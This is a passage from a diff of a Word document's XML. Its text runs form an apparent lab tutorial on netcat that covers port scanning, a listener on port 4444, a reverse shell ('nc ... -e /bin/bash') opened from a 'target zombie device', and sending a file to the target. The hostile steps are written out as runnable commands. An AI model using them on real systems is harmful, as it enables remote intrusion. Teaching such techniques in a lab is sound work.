+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Step 3 : For port scanning, open terminal in host system and type : </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>nc -zv 192.168.0.105 1-1000</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="4">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>130810</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5731510" cy="3468370"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="3" name="Image2" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="3" name="Image2" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId4"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="3468370"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Step 4 : Lets Connect to the web server : first we have to turn on listening mode in the Attacker device.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>nc -lvnp 4444</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">then send Netcat request from the target device and connect with target system </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="5">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>399415</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5731510" cy="2197100"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="4" name="Image3" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="4" name="Image3" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2197100"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>nc 192.168.0.107 4444</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We can communicate with the Target device from our host / attacker Device. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Step 5 : For getting access of the target system shell we have to send reverse shell command from the Target zombie device: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>nc 192.168.0.107 4444 -e /bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="6">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>87630</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5731510" cy="3223895"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="5" name="Image4" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="5" name="Image4" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="3223895"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We Just Get the reverse shell from the target device and execute shell commands there…!! </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Now if want to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>send a file to the target device</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> : </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In Attacker device Execute : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">cat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Hacked.txt nc -l -p 1234 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In Target Device Execute : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nc 192.168.0.107 1234 &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Hacked</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.tx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="7">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-83820</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>405765</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5731510" cy="1613535"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="6" name="Image5" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="6" name="Image5" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="1613535"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -533,6 +2100,255 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
+  <w:abstractNum w:abstractNumId="1">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="705"/>
+        </w:tabs>
+        <w:ind w:left="705" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr/>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1065"/>
+        </w:tabs>
+        <w:ind w:left="1065" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr/>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1425"/>
+        </w:tabs>
+        <w:ind w:left="1425" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr/>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1785"/>
+        </w:tabs>
+        <w:ind w:left="1785" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr/>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2145"/>
+        </w:tabs>
+        <w:ind w:left="2145" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr/>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2505"/>
+        </w:tabs>
+        <w:ind w:left="2505" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr/>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2865"/>
+        </w:tabs>
+        <w:ind w:left="2865" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr/>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3225"/>
+        </w:tabs>
+        <w:ind w:left="3225" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr/>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3585"/>
+        </w:tabs>
